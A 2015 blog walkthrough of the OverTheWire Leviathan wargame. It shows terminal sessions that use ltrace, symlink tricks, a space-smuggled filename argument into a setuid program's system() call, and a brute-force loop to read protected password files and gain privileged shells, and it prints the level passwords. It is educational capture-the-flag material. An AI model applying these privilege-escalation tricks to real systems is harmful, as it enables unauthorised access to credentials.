Leviathan Walkthrough

posted on 2015-01-22 01:38:57

http://overthewire.org/wargames/leviathan/ is just as much fun as bandit, which I covered in an earlier post.

prerequisites

Just go and have a look at the bandit post mentioned above.

solutions

Here is what I have found by now.

level 0

leviathan0@melinda:~$ ls -alh
total 24K
drwxr-xr-x   3 root       root       4.0K Nov 14 10:32 .
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ..
drwxr-x---   2 leviathan1 leviathan0 4.0K Nov 14 10:32 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
leviathan0@melinda:~$ cd .backup/
leviathan0@melinda:~/.backup$ ls -alh
total 140K
drwxr-x--- 2 leviathan1 leviathan0 4.0K Nov 14 10:32 .
drwxr-xr-x 3 root       root       4.0K Nov 14 10:32 ..
-rw-r----- 1 leviathan1 leviathan0 131K Nov 14 10:32 bookmarks.html
leviathan0@melinda:~/.backup$ grep leviathan1 *
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

The password is rioGegei8m, as can be seen in the last line.

level 1

ltrace, which traces library calls, is the key here.

leviathan1@melinda:~$ ls -alhF
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7.4K Nov 14 10:32 check*
leviathan1@melinda:~$ ./check 
password: 


Wrong password, Good Bye ...
leviathan1@melinda:~$ ltrace ./check 
__libc_start_main(0x804852d, 1, 0xffffd784, 0x80485f0 <unfinished ...>
printf("password: ")                             = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password: 
)     = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642
)     = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642
)     = 10
strcmp("\n\n\n", "sex")                          = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)             = 29
+++ exited (status 0) +++
leviathan1@melinda:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ cd /                  
$ pwd
/
$ find . -iname "*leviathan*2*" | less

Then in less, use & to show just lines matching your search content, and type leviathan2 and hit enter, which will give you this:

./etc/leviathan_pass/leviathan2
./home/leviathan2
~
~
~
~
~
~
~
~
~
& (END)

So:

$ cat ./etc/leviathan_pass/leviathan2
ougahZi8Ta

level 2

:(

leviathan2@melinda:~$ ls -alh
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 .
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan3 leviathan2 7.4K Nov 14 10:32 printfile
leviathan2@melinda:~$ ./printfile 
*** File Printer ***
Usage: ./printfile filename
leviathan2@melinda:~$ mkdir -p /tmp/sjas/
leviathan2@melinda:~$ ln -s /etc/leviathan_pass/leviathan3 /tmp/sjas/lvl2
leviathan2@melinda:~$ ls -alh /tmp/sjas/lvl2 
lrwxrwxrwx 1 leviathan2 leviathan2 30 Jan 22 01:15 /tmp/sjas/lvl2 -> /etc/leviathan_pass/leviathan3
leviathan2@melinda:~$ touch /tmp/sjas/asdf\ lvl2
leviathan2@melinda:~$ ./printfile /tmp/sjas/lvl2\ asdf 
You cant have that file...
leviathan2@melinda:~$ touch /tmp/sjas/lvl2\ asdf
leviathan2@melinda:~$ ./printfile /tmp/sjas/lvl2\ asdf
Ahdiemoo1j
/bin/cat: asdf: No such file or directory

And we get the password: Ahdiemoo1j

This is a security flaw. But neither strace nor this here...

leviathan2@melinda:~$ ltrace ./printfile /tmp/sjas/lvl2\ asdf
__libc_start_main(0x804852d, 2, 0xffffd754, 0x8048600 <unfinished ...>
access("/tmp/sjas/lvl2 asdf", 4)                 = 0
snprintf("/bin/cat /tmp/sjas/lvl2 asdf", 511, "/bin/cat %s", "/tmp/sjas/lvl2 asdf") = 28
system("/bin/cat /tmp/sjas/lvl2 asdf"/bin/cat: /tmp/sjas/lvl2: Permission denied
/bin/cat: asdf: No such file or directory
 <no return ...>
 --- SIGCHLD (Child exited) ---
 <... system resumed> )                           = 256
 +++ exited (status 0) +++

... helped my understanding much.

By using the space in the filename, this works. If only the link were used, it wouldn't work. I cannot tell you more, since I googled this as I wasn't smart enough to figure this out by myself.

See https://www.gnu.org/software/libc/manual/html_node/Testing-File-Access.html for more info, if you happen to program C.

level 3

 1  leviathan3@melinda:~$ ls -alh
 2  total 28K
 3  drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 .
 4  drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ..
 5  -rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
 6  -rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
 7  -rw-r--r--   1 root       root        675 Apr  9  2014 .profile
 8  -r-sr-x---   1 leviathan4 leviathan3 7.4K Nov 14 10:32 level3
 9  leviathan3@melinda:~$ ./level3 
10  Enter the password> 
11  bzzzzzzzzap. WRONG
12  leviathan3@melinda:~$ ltrace ./level3 
13  __libc_start_main(0x8048450, 1, 0xffffd784, 0x8048600 <unfinished ...>
14  __printf_chk(1, 0x80486ca, 0x804860b, 0xf7fca000) = 20
15  fgets(Enter the password>                
16  "\n", 256, 0xf7fcac20)                     = 0xffffd5bc
17  puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
18  )                       = 19
19  +++ exited (status 0) +++
20  leviathan3@melinda:~$ strings ./level3 
21  /lib/ld-linux.so.2
22  libc.so.6
23  _IO_stdin_used
24  __printf_chk
25  puts
26  __stack_chk_fail
27  stdin
28  fgets
29  system
30  __libc_start_main
31  __gmon_start__
32  GLIBC_2.3.4
33  GLIBC_2.4
34  GLIBC_2.0
35  PTRhp
36  QVhP
37  [^_]
38  snlprintf
39  [You've got shell]!
40  /bin/sh
41  bzzzzzzzzap. WRONG
42  Enter the password> 
43  ;*2$",
44  secret
45  leviathan3@melinda:~$ ./level3 
46  Enter the password> snlprintf
47  [You've got shell]!
48  $ id
49  uid=12003(leviathan3) gid=12003(leviathan3) euid=12004(leviathan4) groups=12004(leviathan4),12003(leviathan3)
50  $ cat /etc/leviathan_pass/leviathan4
51  vuH0coox6m

Line 37 should be the if-clause or something, 38 the string to test against. Line 39 and 40 are the branch for true whereas 41 is the branch for false?

So much for some wild guesswork.

level 4

leviathan4@melinda:~$ ls -lahF
total 24K
drwxr-xr-x   3 root root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root root        675 Apr  9  2014 .profile
dr-xr-x---   2 root leviathan4 4.0K Nov 14 10:32 .trash/
leviathan4@melinda:~$ cd .trash/
leviathan4@melinda:~/.trash$ ls -lahF
total 16K
dr-xr-x--- 2 root       leviathan4 4.0K Nov 14 10:32 ./
drwxr-xr-x 3 root       root       4.0K Nov 14 10:32 ../
-r-sr-x--- 1 leviathan5 leviathan4 7.3K Nov 14 10:32 bin*
leviathan4@melinda:~/.trash$ ./bin 
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010 
leviathan4@melinda:~/.trash$ ltrace ./bin 
__libc_start_main(0x80484cd, 1, 0xffffd754, 0x80485c0 <unfinished ...>
fopen("/etc/leviathan_pass/leviathan5", "r")      = 0
+++ exited (status 255) +++
leviathan4@melinda:~/.trash$ for i in `./bin`; do echo "ibase=2;$i" | bc; done
84
105
116
104
52
99
111
107
101
105
10
leviathan4@melinda:~/.trash$ for i in `./bin`; do j=$(echo "ibase=2;$i" | bc); printf "\x$(printf %x $j)"; done
Tith4cokei

This was some ugly stuff at the end. Once you see the binary values and convert them to decimal, the numbers look like ASCII character codes. The decoding printf statement is from stackoverflow.com.

level 5

leviathan5@melinda:~$ ls -lahF
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan6 leviathan5 7.5K Nov 14 10:32 leviathan5*
leviathan5@melinda:~$ ./leviathan5 
Cannot find /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5 
__libc_start_main(0x80485ed, 1, 0xffffd774, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                      = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5 
UgaoFee4li

No explanation here, as this one was rather easy.

level 6

leviathan6@melinda:~$ ls -lahF
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan7 leviathan6 7.4K Nov 14 10:32 leviathan6*
leviathan6@melinda:~$ ./leviathan6 
usage: ./leviathan6 <4 digit code>
leviathan6@melinda:~$ ltrace ./leviathan6 
__libc_start_main(0x804850d, 1, 0xffffd774, 0x8048590 <unfinished ...>
printf("usage: %s <4 digit code>\n", "./leviathan6"usage: ./leviathan6 <4 digit code>
) = 35
exit(-1 <no return ...>
+++ exited (status 255) +++
leviathan6@melinda:~$ for i in `seq 0000 9999`; do echo $i; ./leviathan6 $i; done
Wrong
0
Wrong
1
Wrong
2
Wrong
3
Wrong
4


... this takes a while.


Wrong
7120
Wrong
7121
Wrong
7122
Wrong
7123
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

Bruteforcing this with a bash one-liner is the easiest option to find '7123'. Cat the PW file once you have the leviathan7 shell and you are done.

level 7

leviathan7@melinda:~$ ls -lahF
total 24K
drwxr-xr-x   2 root       root       4.0K Nov 14 10:32 ./
drwxr-xr-x 167 root       root       4.0K Jan 12 17:44 ../
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r--r-----   1 leviathan7 leviathan7  178 Nov 14 10:32 CONGRATULATIONS
leviathan7@melinda:~$ cat CONGRATULATIONS 
Well Done, you seem to have used a *nix system before, now try something more serious.
(Please don't post writeups, solutions or spoilers about the games on the web. Thank you!)
leviathan7@melinda:~$ 

Ooooops.



Unless otherwise credited all material Creative Commons License by sjas